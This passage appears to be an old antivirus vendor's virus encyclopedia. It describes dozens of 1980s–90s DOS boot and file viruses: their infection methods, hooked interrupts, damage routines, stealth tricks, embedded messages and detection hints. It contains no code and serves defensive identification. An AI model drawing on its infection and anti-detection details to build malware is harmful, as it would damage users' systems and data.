home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hot Shareware 32
/
hot34.iso
/
ficheros
/
NINET
/
SMME153.ZIP
/
DATA.1
/
COMMON.VIR
next >
Wrap
Text File
|
1997-12-11
|
1MB
|
31,349 lines
[(c)Brain]
Virus Name: (c)Brain
Alias Name: Pakistani, Clone, Nipper
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 3-7 Kbytes.
This virus moves the boot sector and replaces it with a copy of
the virus. The original boot sector will be moved to another
sector and marked as bad. This virus will also change the disk
label to read:
"(c) Brain"
The following text is located in the virus:
Welcome to the Dungeon
(c) 1986 Basit & Amjad (pvt) Ltd.
BRAIN COMPUTER SERVICES
730 NIZAB BLOCK ALLAMA IQBAL TOWN
LAHORE-PAKISTAN
PHONE :430791,443248,280530.
Beware of this VIRUS....
Contact us for vaccination.................
$#@%$@!!
[555]
Virus Name: 555
Alias Name: Dutch 555, Quit-199
Virus Type: File Virus
Virus Length: 555 bytes
Description: This virus infects *.COM and *.EXE files, as well
as COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 560 bytes.
Once the virus is memory resident, it will infect *.COM and *.EXE
files as they are executed. Infected files will increase in size
by 555 bytes, with the virus being located at the end of the
infected file. Infected files will have their date and time records
updated to the date and time the infection occurred.
[AirCop]
Virus Name: AirCop
Alias Name:
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
When a system is booted from a disk infected by the virus, the
virus will install itself memory resident. Total system memory
will decrease by 1,024 bytes.
Once the virus is memory resident, all unprotected diskettes accessed
will be infected. The virus will replace the floppy boot sector
with a copy of itself.
The virus will show the following message on infected systems:
"Red State, Germ Offensive.
AIRCOP."
[Alameda]
Virus Name: Alameda
Alias Name: Alemeda
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
When the system is booted from a disk infected by the virus, the
virus will install itself memory resident.
Once the virus is memory resident, all unprotected 5-1/4" 360k
diskettes will be infected when it activates through a warm boot
(CTRL-ALT-DEL). (The virus remains in memory after a warm boot).
[Ambulance]
Virus Name: Ambulance
Alias Name: Ambulance Car, RedX
Virus Type: File Virus
Virus Length: 796 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus will attempt to infect
one *.COM file.
Other symptoms include displaying a moving ambulance at the bottom
of the screen as well as playing the sound of a siren.
[AntiEXE]
Virus Name: AntiEXE
Alias Name: D3, NewBug, CMOS4
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
When the system is booted from a disk infected by the virus, the
virus will install itself memory resident. Total available memory
will decrease by 1,024 bytes. The virus will also overwrite the
Master Boot Sector with a copy of the virus.
Once the virus is memory resident, it will infect all unprotected
diskettes.
[Atomic]
Virus Name: Atomic
Alias Name:
Virus Type: File Virus
Virus Length: 371 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus will infect the first
two *.COM files located in the same directory. The virus will
permanently overwrite the first 371 bytes of the files it infects.
Date and time fields of infected files will not be altered. The
virus will show the following message after infecting a file:
"Bad command or file name"
The following text string is located in the virus:
"[TAD1A] Memory Lapse -- Toronto, CANADA"
"The Atomic Dustbin 1A -- This is just the first
step"
"Bad command or file name"
"*.COM .. c Dustbin 1A -- This is just the first
step"
[Austr_Parasite]
Virus Name: Austr_Parasite
Alias Name: Aussie Parasite
Virus Type: File Virus
Virus Length: 292 bytes
Description: This virus infects *.COM files as well as COMMAND.COM.
When an infected file is executed, the virus will install itself
into memory. Total available memory will decrease by 320 bytes.
Once the virus is memory resident, all executing *.COM files will
be infected. Infected files will increase in size by 292 bytes,
with the virus being located at the end of the infected file.
Date and time records of infected files will not be altered.
Symptoms include system hanging.
The following text string is visible in the virus:
"Australian Parasite"
[Bljec]
Virus Name: Bljec
Alias Name: Black Jec
Virus Type: File Virus
Virus Length: 231-440 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus will infect three *.COM
programs in the same directory. Infected files will increase in
size by 231-440 bytes, with the virus being located at the beginning
of the infected file. Infected files will have their date and time
records updated to the date and time the infection occurred.
Symptoms include system hanging.
[Butterfly]
Virus Name: Butterfly
Alias Name: Butterflies
Virus Type: File Virus
Virus Length: 302 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus will infect all the
*.COM files located in the same directory.
Infected files will increase in size by 302 bytes, with the virus
being located at the end of the infected file. Infected files will
not have their date and time records altered.
The following text string is located in the virus:
"Goddamn Butterflies"
"*.COM"
[Cascade]
Virus Name: Cascade
Alias Name: Black Jack, Falling
Virus Type: File Virus
Virus Length: 1,701 or 1,704 bytes
Description: This virus infects *.COM files.
When an infected file is executed, the virus installs itself into
memory.
Once the virus is memory resident, it will cause the characters on
the screen to fall to the bottom of the screen.
[Connie]
Virus Name: Connie
Alias Name:
Virus Type: File Virus
Virus Length: 1,761 bytes
Description: This virus infects *.COM files, as well as COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 3,520 bytes.
Once the virus is memory resident, it will infect *.COM files when
they are executed, opened, or copied. Infected files will increase
in size by 1,761 bytes, with the virus being located at the
end of the infected file. The date and time information of infected
files will not be altered.
The following text string can be found in the virus:
"This is <Connie> Written by Dark Slayer in
Keelung TAIWAN P:\COMMAND.COM"
[CVirus]
Virus Name: CVirus
Alias Name: Nowhere Man, VMessi
Virus Type: File Virus
Virus Length:
Description: This virus infects *.COM and *.EXE files that are
larger than 6,300 bytes in size.
When an infected file is executed, the virus will search for a
suitable file to infect (larger than 6,300 bytes in size). Infected
files will have the first original 6,286 bytes overwritten by the
virus. Date and time information of infected files will not be
altered. Once a file is successfully infected, the following message
will be displayed on the screen:
"Out of memory"
If infection is not possible, the following message will be displayed:
"All files infected. Mission complete."
The following text string can be found in the virus:
"NMAN"
"BMAN"
"*.EXE"
[DataLock]
Virus Name: DataLock
Alias Name: Datalock.920.A, V920
Virus Type: File Virus
Virus Length: 920 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 21h
Infection method: When an infected file runs, the virus loads itself
into memory. While loaded, it infects any file that executes.
Infected files increase by 920 bytes.
Damage: After August 1990, the virus won't allow files with the
extension .?BF to be opened. When an attempt is made, it displays
the erroneous error message "Too many files open."
[Denzuko]
Virus Name: Denzuko
Alias Name: Den Zuk
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Infection method: When the system attempts to boot from an infected
diskette, the virus loads itself into memory--even if the boot fails.
While loaded, the virus attempts to infect any accessed diskette.
Damage: When <Ctrl><Alt><Del> is pressed, the message "Den Zuk" is
displayed and the system seems to reboot. However, the virus remains
in memory. Because the virus was designed for 360 KB diskettes,
it unintentionally destroys data on 3.5 inch or 1.2 MB diskettes.
[Die_Hard_2]
Virus Name: Die_Hard_2
Alias Name: DH2
Virus Type: File Virus
Virus Length: 4,000 bytes
Description: This virus infects *.COM and *.EXE files.
Interrupt vectors hooked: INT 21h
Infection method: When an infected file runs, the virus loads itself
into memory. While loaded, it infects accessed executable files.
Infected files increase by 4,000 bytes.
Damage: Under analysis
[Dir]
Virus Name: Dir
Alias Name: DIR
Virus Type: File Virus
Virus Length: 691 bytes
Description: See Dir-2
[Dir-2]
Virus Name: Dir-2
Alias Name: Dir-II, Creeping Death
Virus Type: File Virus
Virus Length: 1,024 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: None
Execution Procedure:
1) When the virus loads itself resident in memory it will change
the directory structure data so that certain executable files
are linked to itself.
2) This allows the virus to execute when you execute a file to which
the DIR2-910 virus is linked to. At this point it can begin to
infect other files.
3) The virus stays resident in memory but doesn't hook any interrupts.
It uses another function to infect files. It infects .COM and
.EXE files when they are "READ & WRITE".
Damage: When all the .COM and .EXE files are infected on a disk, it
will not be possible to execute any files from the disk.
Detection Method: Check the disk by using "CHKDSK.EXE"; if some files
are cross-linked to the same position, then these files must be
infected.
Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Disk_Killer]
Virus Name: Disk_Killer
Alias Name: Ogre
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Infection method: When the system is booted from an infected disk,
the virus loads itself into memory.
Damage: After the computer has been on for 48 hours, the virus
displays the following message and then encrypts all the data on
the hard disk:
"Disk Killer -- Version 1.00 by COMPUTER OGRE
04/01/1989
Warning!!
Don't turn off the power or
remove the diskette while Disk Killer is Processing.
Processing.
Now you can turn off the power. I wish you luck."
[EDV]
Virus Name: EDV
Alias Name: Cursy
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
When the system is booted from a disk infected by the virus, the
virus will install itself into memory.
Once the virus is memory resident, it will infect any accessed floppy
disks. It will move the original boot sector, replacing it with a
copy of the virus.
Once the virus has infected six disks, it will disable the keyboard
as well as corrupt all disks in the system. Once completed, the
following message will be displayed on the screen:
"That rings a bell, no? From Cursy"
The following string can be found in infected boot sectors:
"MSDOS Vers. E.D.V."
[Exebug]
Virus Name: Exebug
Alias Name: Swiss Boot, CMOS killer
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When the system is booted from an Exebug infected
diskette, the Exebug virus will install itself memory resident at
the top of system memory but below the 640K DOS boundary,
moving interrupt 12's return. Total system and available free
memory will decrease by 1,024 bytes. Also at this time, the virus
will infect the system hard disk's master boot sector.
Damage: Master boot sector corruption; decrease in total system
and available free memory; inability to access drive C: after diskette
boot.
[Fat_Table]
Virus Name: Fat_Table
Alias Name:
Virus Type: File Virus
Virus Length: 6,540 bytes
Description: This virus infects *.EXE files.
When an infected file is executed, the virus will infect one *.EXE
file located in the same directory. The virus will overwrite the
first 6,540 bytes of the original file. Date and time information of
infected files will be updated to the time of infection.
The following text string can be found in the virus:
"hitohana"
"karu ba"
"rb C:\ * .* FAT TABLE E"
"8RROR"
"EXE"
"COM"
[Filler.A]
Virus Name: Filler.A
Alias Name: Filler
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Infection method: When the system is booted from an infected floppy,
the virus loads itself into memory. While loaded, it infects any
accessed, non-protected disks. The DOS CHKDSK program will
show a "total bytes memory" decrease of 8,192 bytes.
Damage: Under analysis
[Flip]
Virus Name: Flip
Alias Name:
Virus Type: Boot Virus
Virus Length: 2,672 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 21h
Infection Process: This virus spreads by executing an infected
program or by booting the system with an infected disk. There are
several methods of infection.
1) Infection of a clean system by an infected program.
When an infected program is executed in a clean system, the virus
will copy itself in the last side of the last cylinder, beginning
from the 5th last sector to the 1st last sector and the virus
will subtract the DOS boot sector at offset 0x13h (Number of logical
sectors) with 6. Finally, the virus code is written onto the partition
sector.
2) Spreading the infection through an infected disk.
If a PC is booted from an infected disk, the spreading of the infection
is complete. The boot code, previously overwritten by the virus on the
disk partition sector, reads the main core of the virus from the last
5 sectors to the last sector, and loads it as a TSR in RAM, occupying
3 Kb of the higher part of system memory. As soon as it is installed
as a TSR, the virus takes control of Int 1Ch (Timer Interrupt) to
verify, with a frequency of 18.2 times per second, if the DOS
COMMAND.COM is loaded. If DOS is present, the virus restores the
timer and takes control of Int 21h.
Damage: Loss of data stored in the 6th last to 1st last sectors of the
disk. Virus also increases file sizes.
Symptoms: Virus turns screen display upside down (rotates 180 degrees).
File sizes increase by 2,153 bytes.
Note: The virus uses a smart technique to avoid anti-virus detection
programs, when modifying the partition sector, that is hooking int
01h, it will turn on a single step flag to get the original
entry of DOS hooked of INT 13h . The virus will then move itself to
the top of the MCB (memory control block), and decrease available
memory in the MCB by 2672 (A70h) bytes. It will hook Int 21h
with the same method as for INT 13h and then proceeds to run the
original program.
[Form.A]
Virus Name: Form.A
Alias Name: FORM, Form, Form 18, Generic
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h, INT 09h
Infection method: When the system is booted from an infected diskette,
the virus infects the DOS boot sector and loads itself into memory.
While loaded, it infects any accessed, non-protected disks. The DOS
CHKDSK program will indicate 653,312 bytes of free memory.
Damage: On the 18th day of any month, the virus will emit a clicking
sound whenever keys are pressed. The system may hang when a read
error occurs, and parts of the original boot sector may be
overwritten, making the partition unbootable.
[Friday_13th]
Virus Name: Friday_13th
Alias Name: Friday the 13th, Virus 1813, Israelian, Jerusalem
Virus Type: File Virus
Virus Length: approx. 1,813 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: Int 21
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident in memory it will infect any uninfected
file that is executed.
Damage: In the year 1987, the virus does no damage. It proceeds only
to infect other files. Every Friday the 13th, excluding the year 1987,
the virus deletes every executed program . All other days, excluding
the year 1987, the virus spreads. About half an hour after the virus
is installed in memory it scrolls up by two lines a small window
with coordinates (5, 5), (16, 16) and slows down computer speed.
Delay loop repeats 18.5 times per second.
Detection Method: Increases the file length by 1813 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Frodo.Frodo.A]
Virus Name: Frodo.Frodo.A
Alias Name: 4096, IDF, 4096-1, Frodo, Frodo.Frodo.A, 100 Year
Virus Type: File Virus
Virus Length: 4,096 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 21h, INT 13h
Infection method: When an infected file runs, the virus loads itself
in memory. While loaded, it infects accessed executable files. The
virus increases the size of infected files by 4096 bytes.
Damage: After September 21, the virus tries to modify the boot sector
to display "FRODO LIVES." However, the virus code is corrupted, so
instead of modifying the system areas, it crashes the system.
Note: While the virus is in memory, it hides the increase in infected
file sizes.
[Generic_408]
Virus Name: Generic_408
Alias Name: NYB, B1
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Infection method: When the system is booted from an infected diskette,
the virus infects the master boot record and loads itself in memory.
While loaded, it infects any accessed, non-protected disks.
Damage: None known
[Generic_437]
Virus Name: Generic_437
Alias Name: Boot-437
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
This virus will only infect hard drives when an attempt to boot
from an infected diskette is made. Once the virus has infected
the hard drive, all non-protected floppies used in the machine will
be infected.
Unlike most other boot sector viruses (except Form), Boot-437
infects the DOS boot sector on hard drives instead of the Master
Boot Record.
[GreenCat]
Virus Name: GreenCat
Alias Name: Green Caterpillar, Green_Caterpillar.1575.A, Find, 1591,
1575
Virus Type: File Virus
Virus Length: 1,991 to 2,005 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 21h
Infection method: When an infected file runs, the virus loads itself
in memory.
Damage: After a specific time period has elapsed, the execution of
an infected file causes a green caterpillar to run across the screen,
excreting the screen contents as it goes. There is no permanent
damage.
[Grog31]
Virus Name: Grog31
Alias Name: Grog 3.1
Virus Type: File Virus
Virus Length: 1,200 bytes
Description: This virus infects *.COM files as well as COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 4,800 bytes. The
virus will also infect COMMAND.COM.
Once the virus is memory resident, it will infect *.COM files
that are larger than 2,000 bytes when they are executed or opened.
Infected files will increase in size by 1,200 bytes, with the virus
being located at the beginning of the infected file. Date and time
information of infected files will not be altered.
The following text string can be found in the virus:
"GROG 4EVER!"
"GROG v3.1 (C) '93 by GROG - Italy"
"Microsoft C:\COMMAND.COM"
[Hacktic2]
Virus Name: Hacktic2
Alias Name:
Virus Type: File Virus
Virus Length: 83 bytes
Description: Infects *.COM and *.EXE files, including COMMAND.COM.
When an infected file is executed, the virus will infect one file
in the current directory, truncating the file size to 83 bytes as
well as changing the file attribute to "hidden." The date and time
information of infected files will be updated to the time of infection.
[Hobbit]
Virus Name: Hobbit
Alias Name:
Virus Type: File Virus
Virus Length: 505 bytes
Description: This virus infects *.EXE files.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 1,440 bytes.
Once the virus is memory resident, it will infect *.EXE when they
are executed or opened. The virus will overwrite the first 505
bytes of the file. Date and time information of infected files will
not be altered.
The following text string can be found in the virus:
"HOBIT"
[Jerusalem]
Virus Name: Jerusalem
Alias Name: Israeli, Jerusalem.1808.Standard, 1808, Israeli,
1813 Jeru-3-3, Jerusalem.1808.Critical.
Virus Type: File Virus
Virus Length: 1,808 to 1,822 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 21h, INT 08h
Infection method: When an infected file runs, the virus loads itself
in memory. While loaded, it infects any file that executes, except the
COMMAND.COM file. The virus increases the size of .EXE files by
1,808-1,822 on the first infection and 1,808 bytes with each
reinfection. Infected .COM files increase by 1,813 bytes.
Damage: On Friday the 13th, after the virus has been resident for 30
minutes, it deletes files that are executed. On other days, the virus
slows down the system 30 minutes after each infection. It also wipes
out an area of the screen, though nothing is displayed. A bug in the
virus can cause .EXE file to be infected repeatedly until they
become too large to execute.
[Joshi]
Virus Name: Joshi
Alias Name: Happy Birthday Joshi
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Detection Method: The first "Joshi" virus was detected in India in June
1990. It is a very popular virus in India. Virus remains resident in
the boot sector or in FAT area. Every January 5, the virus displays:
"Type Happy Birthday Joshi." All will return to normal if the user
types the above message. System memory decreases by 6KB when virus
is resident.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Jumper]
Virus Name: Jumper
Alias Name: 2kb
Virus Type: File Virus
Virus Length: 2,048 bytes
Description: This virus infects *.COM and *.EXE files and COMMAND.COM.
When an infected file is first executed in a clean system, the
virus will load itself into memory. Total memory will decrease by
8,336 bytes. Once the virus is memory resident, it will infect
*.COM and *.EXE files as they are executed. Infected files will have
a file length increase of 2,048 bytes. The date and time information of
infected files will not be altered.
The following text string is located in infected programs:
"BIOS"
[Junkie.A-1]
Virus Name: Junkie.A-1
Alias Name: Junkie
Virus Type: File Virus
Virus Length: N/A
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 1Ch, INT 21h
Infection method: The first time an infected file runs, the virus
overwrites the hard disk's master boot record. When the system is
booted again (or when it is booted from an infected diskette), the
virus loads itself in memory. While loaded, the virus infects any
.COM file that executes and any accessed diskettes. The DOS CHKDSK
program will show a "total bytes memory" decrease of 3,072 bytes.
Infected files increase by just over 1,000 bytes.
Damage: None known
[K_Hate]
Virus Name: K_Hate
Alias Name: K-Hate
Virus Type: File Virus
Virus Length: 1,237 to 1,304 bytes
Description: This virus infects *.COM files including COMMAND.COM.
When an infected file is executed, the virus will infect all *.COM
files in the same directory. Infected files will experience a file
length increase of 1,237 to 1,304 bytes with the virus being located at
the end of the file. Date and time information of infected files will
not be altered.
The following text string can be found in the virus:
"CRYPT INFO"
"KDG 0,5 / Khntark3"
"*, K-HATE / Khntark*.COM"
[Kampana.A]
Virus Name: Kampana.A
Alias Name: Telecom Boot, Campa, Anti-Tel, Brasil
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When the system is booted from an infected diskette,
the virus loads itself in memory. While loaded, it infects any accessed
disks. The DOS CHKDSK program will show a "total bytes memory" decrease
of 1,024 bytes.
Damage: After a number of reboots, the virus overwrites sectors of the
hard disk.
Note: If you attempt to examine the master boot record while the virus
is loaded, it will display the original, uninfected version.
[KeyKapture]
Virus Name: KeyKapture
Alias Name: KeyKap, Hellspawn.1
Virus Type: File Virus
Virus Length: 1,074 bytes
Description: Infects *.EXE files by creating a hidden *.COM file of the
same name in the same directory.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 3,072 bytes.
Once the virus is memory resident, it will infect *.EXE when they are
executed by creating a 1,074 byte *.COM file of the same name. The
original *.EXE file will not be changed in any way. Infected systems
may experience system hangs.
The following text string can be found in the virus:
"KKV.90 KeyKapture Virus v0.90 [Hellspawn-II]
(c) 1994 by Stormbringer [PS]"
[MacGyver]
Virus Name: MacGyver
Alias Name:
Virus Type: File Virus
Virus Length: 2,824 bytes
Description: This virus infects *.EXE files.
Infection method: When the infected program is executed, the MacGyver
virus will install itself memory resident as a low system memory TSR
of 3,072 bytes. When the MacGyver virus is memory resident, it will
infect .EXE programs when they are executed or opened. The following
text string is visible within the MacGyver viral code in all infected
programs:
"SCANVIR.SHW"
Damage: It may cause frequent system hangs when .EXE programs are
executed. The DOS CHKDSK program will indicate file allocation errors
on all infected files when the virus is memory resident.
[Metal_Militia]
Virus Name: Metal_Militia
Alias Name: MMIR, Immortal Riot
Virus Type: File Virus
Virus Length: 282 bytes
Description: This virus infects *.COM files, as well as COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 3,072 bytes.
Once the virus is memory resident, it will infect *.COM files when
they are executed. Infected files will increase in size by 1,054-5
bytes, with the virus being located at the beginning of the infected
file. Date and time information of infected files will not be altered.
The following text string can be found in the virus:
"Senseless Destruction..."
"Protecting what we are joining together to take
on the world.."
"METAL MiLiTiA [iMMORTAL RIOT] SVW"
[Michelangelo]
Virus Name: Michelangelo
Alias Name:
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects disk boot sectors.
When the system is booted from a disk infected with the Michelangelo
virus, the virus will install itself into memory. Total available
memory will decrease by 2,048 bytes.
Once the virus is memory resident, it will infect diskette boot sectors
on access. The virus will move the original boot sector and replace
it with a copy of the virus.
This virus activates on March 6. It will format the hard disk,
overwriting all existing data.
[Monkey]
Virus Name: Monkey
Alias Name: Stoned.Empire.Monkey.B, Monkey 2
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Infection method: When the system is booted with an infected diskette,
the virus loads itself in memory. While loaded, it infects any
accessed, non-protected disks. The DOS CHKDSK program will show a
"total bytes memory" decrease of 1,024 bytes. Monkey-1 is one of the
few viruses that can successfully infect floppies while Microsoft
Windows is running.
Damage: The virus encrypts the partition table of the master boot
record. If you attempt to boot from a clean floppy, the disk will
be inaccessible because the partition table has been moved.
Note: If you attempt to examine the master boot record while the
virus is in memory, it will display the original, uninfected version.
Caution: Do not use FDISK /MBR to clean this virus.
[Mummy]
Virus Name: Mummy
Alias Name:
Virus Type: File Virus
Virus Length: 1,300 - 1,503 bytes
Description: This virus infects *.EXE files.
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident in memory it will infect any uninfected
file that is executed.
Damage: This virus has several variants. While some variants have no
damage routine, some will slow down the system performance and variants
of the Mummy virus will have a Random Number counter. When the counter
reaches zero, the virus will overwrite the first part of the hard disk
and cause severe data loss.
Detection Method: Increases infected file size by 1,300-1,503 bytes.
Virus occasionally hangs the system when the virus is resident in
memory. Encrypted text strings inside the virus code:
"Mummy Version x.xxx",
"Kaohsiung Senior School",
"Tzeng Jau Ming presents",
"Series Number=[xxxxx]."
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Natas]
Virus Name: Natas
Alias Name: Satan, Sat_Bug.Natas, Natas-4, Natas-6
Virus Type: File Virus
Virus Length: 4,746 bytes
Description: This virus infects *.COM and *.EXE files.
PC Vectors Hooked: INT 13h, INT 21h
Infection method: When the system is booted with an infected disk,
the virus loads itself in memory and infects the master boot record.
While loaded, it infects any accessed executable files or diskettes.
Total system memory decreases by 5,664 bytes. Infected files increase
in length by 4,744 bytes.
Damage: The virus formats the hard disk and destroys data stored on
diskettes.
[No_of_Beast]
Virus Name: No_of_Beast
Alias Name: No. of the Beast,
Number_of_the_Beast.E, DARTH, 666, 512
Virus Type: File Virus
Virus Length: 512 bytes
Description: This virus infects *.COM files.
PC Vectors Hooked: INT 13h, INT 21h
Infection method: When an infected file runs, the virus loads itself
in the memory. While loaded, it infects accessed .COM files. The
virus overwrites the first 512 bytes of the files it infects, but
stores the original data in free space at the end of the file.
Damage: If an infected file is copied, some of its original data could
be destroyed.
Note: If you attempt to examine an infected file while the virus is
in memory, it will display the original, uninfected version.
[Nop]
Virus Name: Nop
Alias Name: Nops, Stealth_Boot
Virus Type:
Virus Length:
Description: See Stealth_Boot.C
[Nov_17th]
Virus Name: Nov_17th
Alias Name: November 17th
Virus Type: File virus
Virus Length: 885 bytes
Description: This virus infects *.COM and *.EXE files.
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident in memory it will infect any uninfected
file that is executed.
Damage: On any day between November 17 and 30, the virus destroys the
first 8 sectors of the current disk.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[One_half]
Virus Name: One_half
Alias Name:
Virus Type: File Virus
Virus Length: 3,544 bytes
Description: Infects *.COM and *.EXE files as well as COMMAND.COM.
PC Vectors Hooked: INT 21h
Infection method: When an infected file runs, the virus loads itself
in memory. While loaded, it infects any accessed executable files or
boot sectors. The DOS CHKDSK program will show a "total bytes memory"
decrease of 4,096 bytes. Infected .COM and .EXE files increase by
3,544 bytes.
Damage: Under analysis
Note: If you attempt to examine the hard drive while the virus is in
memory, it will display the original, uninfected version.
[Ontario]
Virus Name: Ontario
Alias Name:
Virus Type: File virus
Virus Length: 512 bytes
Description: Infects *.COM, *.EXE and overlay files, as well as
COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will decrease by 2,048 bytes.
The virus will also infect COMMAND.COM increasing it's size by 512
bytes.
Once the virus is memory resident, it will infect files when they
are executed. Infected files will increase in size by 512 - 1,023
bytes depending on the type of file.
[Parity_boot.b]
Virus Name: Parity_Boot.B
Alias Name: Parity_BOOT.B, Generic1
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When the system is booted from an infected diskette,
the virus infects the master boot record and loads itself in memory.
While loaded, it infects all accessed, non-protected disks. The DOS
CHKDSK program will show a "total bytes memory" decrease of 1,024 bytes.
Damage: The virus sets a one-hour delay timer when the system is turned
on. Each time a floppy is infected, the timer is reset. If no floppies
are infected, the virus simulates a parity error, displaying the
following message and hanging the system:
Parity Check
Note: If you attempt to examine boot sectors while the virus is in
memory, it will display the original, uninfected version.
[Readiosys]
Virus Name: Readiosys
Alias Name: AntiCMOS, Lenart
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
When the system is booted from an infected hard disk, the virus loads
itself in memory. After loading successfully, it infects most
accessed disks. The DOS CHKDSK program will show a "total bytes
memory" decrease of 2,048 bytes.
This virus may change the CMOS settings, depending on the system
hardware. In many cases, the system will hang before the virus can
finish loading into memory.
[Ripper]
Virus Name: Ripper
Alias Name: Jack Ripper
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
Infection method: The virus is loaded in memory when the system is
booted from an infected diskette. While loaded, the virus infects
any accessed, non-protected disks.
Damage: The virus corrupts the hard disk over time by randomly
selecting disk writes (approximately 1 per 1000) and swapping two
words in the write buffer.
Note: If you attempt to examine the infected boot sectors while the
virus is in memory, it will display the original, uninfected version.
[Slayer]
Virus Name: Slayer
Alias Name: 5120, Vbasic
Virus Type: File Virus
Virus Length: 5,120 bytes
Description: This virus infects *.COM and *.EXE files.
When an infected file is executed, the virus will infect all *.COM
and *.EXE files located in the same directory. Infected files
will increase in size from 5,120 to 5,135 bytes with the virus
being located at the end of the file. Date and time information
of infected files will not be altered.
[Squisher]
Virus Name: Squisher
Alias Name: Tiny Hunter
Virus Type: File Virus
Virus Length: 340 bytes
Description: Infects *.COM files, as well as COMMAND.COM.
When an infected file is executed, the virus installs itself into
memory. Total available memory will not change.
Once the virus is memory resident, it will infect *.COM files that
contain more than 340 bytes of hex '00' characters when they are
executed. Infected files will not experience an increase in size.
Date and time information of infected files will not be altered.
[Stealth_Boot.C]
Virus Name: Stealth_Boot.C
Alias Name: Amse, Nops, STELBOO, STB
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When the system is booted from an infected diskette,
the virus loads itself in memory and infects the master boot record.
While loaded, it infects any accessed, non-protected diskettes. The
DOS CHKDSK program will show a "total bytes memory" decrease of 4,000
bytes.
Damage: No intentional damage
Note: If you attempt to examine the infected hard disk sectors while
the virus is in memory, it will return a zero-filled buffer.
[Stoned]
Virus Name: Stoned
Alias Name: Marijuana, New Zealand, Stoned.Standard.A
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When the system is booted from an infected floppy,
the virus loads itself in memory and infects the hard disk. While
loaded, it infects any accessed diskettes. The DOS CHKDSK program
will show a "total bytes memory" decrease of 2,048 bytes.
Damage: No intentional damage. Displays the text string:
"Your PC is now Stoned!"
[Stoned.Azusa]
Virus Name: Stoned.Azusa
Alias Name: Azusa, Hong Kong
Virus Type: Boot Virus
Virus Length: N/A
Description: This virus infects boot sectors.
PC Vectors Hooked: INT 13h
Infection method: When a system is booted from an infected disk, the
virus loads itself in memory. While loaded, it attempts to infect
any accessed disks. Unlike most boot sector viruses, it does not
preserve a copy of the original master boot record. Instead it
overwrites it and takes over its functions. The DOS CHKDSK program
will show a "total bytes memory" decrease of 1,024 bytes.
Damage: After a specified number of reboots, the virus temporarily
disables the serial and parallel ports.
[Sunday-1]
Virus Name: Sunday-1
Alias Name:
Virus Type: File Virus
Virus Length: 1,636 bytes
Description: Infects *.COM and *.EXE files as well as overlay files.
Damage: On Sunday, the virus may damage the FAT table. It will also
display the following message:
"Today is Sunday! Why do you work so hard?
All work and no play makes you a dull boy!
Come on! Let's go out and have some fun!"
[Taiwan]
Virus Name: Taiwan
Alias Name: Taiwan 2
Virus Type: File Virus
Virus Length: 743 bytes
